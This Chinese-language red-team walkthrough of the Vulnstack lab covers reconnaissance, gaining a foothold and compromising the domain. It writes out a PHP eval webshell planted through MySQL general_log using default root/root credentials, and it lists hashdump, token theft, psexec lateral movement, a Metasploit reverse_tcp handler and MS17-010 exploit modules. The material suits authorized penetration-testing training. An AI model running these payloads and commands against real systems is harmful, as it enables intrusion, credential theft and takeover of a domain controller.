Vulnstack 红队实战渗透教学文档

0X00 环境搭建

1.1 配置网络

• 靶机网络配置：192.168.72.0/24（模拟公网）
• 内网网络配置：192.168.52.0/24（模拟内网）

1.2 启动靶场

• 启动Web环境（phpStudy环境）

0X01 信息收集

2.1 主机发现

netdiscover -i eth0 -r 192.168.72.0/24

2.2 端口扫描

nmap -sC -sV -Pn -p 1-65535 192.168.72.130

0X02 漏洞利用

3.1 发现漏洞

• 发现80端口运行phpStudy探针页面
• MySQL数据库默认账号密码为root/root，可外连

3.2 phpMyAdmin利用

1. 检查日志状态：

show variables like '%general%';

2. 开启日志并设置日志路径：

SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/233.php'

3. 写入一句话木马：

SELECT '<?php eval($_POST["cmd"]);?>'

4. 使用蚁剑连接webshell

0X03 内网信息收集

4.1 CS上线

• 通过webshell上传CS后门并执行

4.2 提权

• 使用本地提权技术获取更高权限

4.3 获取凭证

hashdump

4.4 网络拓扑分析

• 公网：192.168.72.0/24
• 内网：192.168.52.0/24

4.5 域信息收集

whoami
ipconfig /all
hostname
nslookup god.org
systeminfo
net config workstation
net view /domain
net time /domain

4.6 域内存活主机探测

使用Ladon工具扫描：

Ladon 192.168.52.0/24 OnlinePC

发现：

• 域控(DC)：192.168.52.141
• 域成员：192.168.52.138

4.7 查找域控

net time /domain
net group "domain controllers" /domain

4.8 使用BloodHound分析域关系

• 查找到域管理员的最短路径

0X04 横向移动

5.1 SMB Beacon使用

• 由于内网段无法直接连接Kali，需要派生SMB Beacon
• SMB Beacon通过命名管道通信，隐蔽性高

5.1.1 psexec横向移动

• 使用psexec在域内横向移动

5.1.2 Token窃取

steal token

5.1.3 CS与MSF联动利用MS17-010

1. 设置代理：

socks 1080

2. MSF配置：

setg Proxies socks4:127.0.0.1:1080
setg ReverseAllowProxy true

3. 建立监听：

handler -p windows/meterpreter/reverse_tcp -H 0.0.0.0 -P 6789

4. CS创建外部监听器并选择MSF监听器

5.1.4 MS17-010利用模块

1. 使用命令执行模块：

use auxiliary/admin/smb/ms17010command

2. 使用psexec模块：

use exploit/windows/smb/ms17010psexec
set payload windows/meterpreter/bind_tcp

3. 成功利用后可：

• 远程开启3389
• 让目标主机下载木马
• 直接获取权限

最终成果

• 获取域控权限
• 完成整个内网渗透

注意事项

1. 所有技术仅用于合法授权测试
2. 不得用于非法用途
3. 测试前需获得书面授权